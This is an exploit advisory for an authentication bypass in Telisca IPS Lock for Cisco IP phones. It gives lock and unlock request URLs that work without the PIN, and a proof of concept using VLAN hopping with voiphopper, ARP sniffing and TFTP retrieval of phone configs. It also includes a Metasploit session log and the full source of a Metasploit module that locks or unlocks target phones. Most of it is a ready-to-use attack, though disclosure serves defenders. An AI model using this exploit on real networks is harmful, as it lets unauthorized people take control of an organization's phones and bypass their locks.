a vulnerability in IPS LOCK , below is the description :
# Exploit Title: TELISCA IPS LOCK ABUSE
# Date: 13/01/2016
# Software Link: http://www.telisca.com/products/ip-phone-apps/ipslock/
# Exploit Author: Fakhir Karim Reda
# Contact: karim.fakhir@gmail.com
# Metasploit module :
https://www.rapid7.com/db/modules/auxiliary/voip/telisca_ips_lock_control
# Publicly disclosed via Metaploit PR 'URL',
'https://github.com/rapid7/metasploit-framework/pull/6470'
# Category: VOIP
1. Description
Telisca IPS Lock 2(IPS Lock is an XML application for Cisco IP Phones
which permits locking the phones and preventing any unauthorized
calls.
http://www.telisca.com/ips-lock-2/) suffers from vulnerability that allows any
attacker to lock/unlock IP-Phones without knowing the pin code. The attacker
have just to do http request to IPS Lock Server with Mac ADDR of the phone:
For example to lock the IP Phone SEP27745DA145D2 :
http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl=
For example to unlock the IP Phone SEP27745DA145D2 :
http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp=
Source of problem :
The page default.aspx did not check if the pin code is present or correct.
2. Proof of Concept
The attacker sniff for cdp protocol, and then he identified the vlan voice , for
example VLAN 3 :
With tool like voiphopper he can get an ip on this vlan :
#voiphopper -i eth0 -v 3
#ifconfig
eth0.3 Link encap:Ethernet HWaddr b8:ca:3a:9c:fa:41
inet addr:10.16.43.190 Bcast:10.16.43.255 Mask:255.255.252.0
inet6 addr: fe80::baca:3aff:fe9c:fa41/64
Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500
Metric:1
RX packets:309658 errors:0 dropped:9
overruns:0 frame:0
TX packets:23988 errors:0 dropped:0
overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:15123464 (14.4 MiB) TX bytes:1906037 (1.8 MiB)
We can now
sniff for ARP requests, in order to get the MAC ADDR of phones :
# tcpdump -vvv -e -s 1500 -i eth0.3 "icmp or arp"
tcpdump:
listening on eth0.3, link-type EN10MB (Ethernet), capture size 1500 bytes
16:31:08.531106
00:50:56:be:5e:a7 (oui Unknown) > Broadcast, ethertype ARP (0x0806), length
60: Ethernet (len 6), IPv4 (len 4), Request who-has 10.16.43.184 tell
10.16.40.12, length 46
16:31:08.817916
88:90:8d:73:e7:43 (oui Unknown) > Broadcast, ethertype ARP (0x0806), length
60: Ethernet (len 6), IPv4 (len 4), Request who-has 172.16.40.100 tell
172.16.42.120, length 46
With network scanner he identified the TFTP Server for example 10.16.43.1 :
We can download the ip phones configs
#tftp 10.16.43.1
get SEPSEP27745DA145D2.cnf.xml
The content of the file contain the IPS LOCK IP server :
IPS
Phone Config / IPS Lock
http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?pn=#DEVICENAME#
Accessi to the URL
http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?pn=#DEVICENAME# he
can now get the URLS for locking and unlocking services:
http://IPSLOCKSRV:80/IPSPCFG/user/Default.aspx?action=DO&tg=L&pn=SEP27745DA145D2&dp=&gr=&gl=
For example
to unlock the IP Phone SEP27745DA145D2 :
http://IPSLOCKSRV/IPSPCFG/user/Default.aspx?action=U7LCK&pn=SEP88908D68C5D4&dp=
Finally we can use this metasploit module :
https://raw.githubusercontent.com/kfr-ma/metasploit-framework/test_telisca_ipslock/modules/auxiliary/voip/telisca_ips_lock_control.rb
to lock and unlock phones :
[*]
Processing telisco.rb for ERB directives.
resource (telisco.rb)> use auxiliary/scanner/voice/telisca_ips_lock_abuse
resource (telisco.rb)> set PHONENAME SEP27745DA145D2
PHONENAME=> SEPC80084ED0DBD
resource (telisco.rb)> set RHOST 10.16.40.18
RHOST =>10.16.40.18
resource (telisco.rb)> set VHOST 10.16.40.18
VHOST => 10.16.40.18
resource (telisco.rb)> set ACTION UNLOCK
ACTION => UNLOCK
resource(telisco.rb)> run
[+] Try to unlock
[+] Deivice SEP27745DA145D2 successfully unlocked
[*] Auxiliary module execution completed
msf auxiliary(telisca_ips_lock_abuse) >
Below the source code of the exploit :
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Telisca IPS Lock Cisco IP Phone Control',
'Description' => %q{
This module allows an unauthenticated attacker to exercise the
"Lock" and "Unlock" functionality of Telisca IPS Lock for Cisco IP
Phones. This module should be run in the VoIP VLAN, and requires
knowledge of the target phone's name (for example, SEP002497AB1D4B).
Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.
},
'References' =>
[
# Publicly disclosed via Metaploit PR
'URL', 'https://github.com/rapid7/metasploit-framework/pull/6470'
],
'Author' =>
[
'Fakhir Karim Reda '
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 17 2015',
'Actions' =>
[
['LOCK', 'Description' => 'To lock a phone'],
['UNLOCK', 'Description' => 'To unlock a phone']
],
'DefaultAction' => 'UNLOCK'
))
register_options(
[
OptAddress.new('RHOST', [true, 'The IPS Lock IP Address']),
OptString.new('PHONENAME', [true, 'The name of the target phone'])
], self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
# Returns the status of the listening port.
#
# @return [Boolean] TrueClass if port open, otherwise FalseClass.
def port_open?
begin
res = send_request_raw({'method' => 'GET', 'uri' => '/'})
return true if res
rescue ::Rex::ConnectionRefused
vprint_status("Connection refused")
rescue ::Rex::ConnectionError
vprint_error("Connection failed")
rescue ::OpenSSL::SSL::SSLError
vprint_error("SSL/TLS connection error")
end
false
end
# Locks a device.
#
# @param phone_name [String] Name of the phone used for the pn parameter.
#
# @return [void]
def lock(phone_name)
res = send_request_cgi({
'method' => 'GET',
'uri' => '/IPSPCFG/user/Default.aspx',
'headers' => {
'Connection' => 'keep-alive',
'Accept-Language' => 'en-US,en;q=0.5'
},
'vars_get' => {
'action' => 'DO',
'tg' => 'L',
'pn' => phone_name,
'dp' => '',
'gr' => '',
'gl' => ''
}
})
if res && res.code == 200
if res.body.include?('Unlock') || res.body.include?('U7LCK')
print_good("The device #{phone_name} is already locked")
elsif res.body.include?('unlocked') ||
res.body.include?('Locking') || res.body.include?('QUIT')
print_good("Device #{phone_name} successfully locked")
end
elsif res
print_error("Unexpected response #{res.code}")
else
print_error('The connection timed out while trying to lock.')
end
end
# Unlocks a phone.
#
# @param phone_name [String] Name of the phone used for the pn parameter.
#
# @return [void]
def unlock(phone_name)
res = send_request_cgi({
'method' => 'GET',
'uri' => '/IPSPCFG/user/Default.aspx',
'headers' => {
'Connection' => 'keep-alive',
'Accept-Language' => 'en-US,en;q=0.5'
},
'vars_get' => {
'action' => 'U7LCK',
'pn' => phone_name,
'dp' => ''
}
})
if res && res.code == 200
if res.body.include?('Unlock') || res.body.include?('U7LCK')
print_good("The device #{phone_name} is already locked")
elsif res.body.include?('unlocked') || res.body.include?('QUIT')
print_good("The device #{phone_name} successfully unlocked")
end
elsif res
print_error("Unexpected response #{res.code}")
else
print_error('The connection timed out while trying to unlock')
end
end
def run
unless port_open?
print_error('The web server is unreachable!')
return
end
phone_name = datastore['PHONENAME']
case action.name
when 'LOCK'
lock(phone_name)
when 'UNLOCK'
unlock(phone_name)
end
end
end
Regards.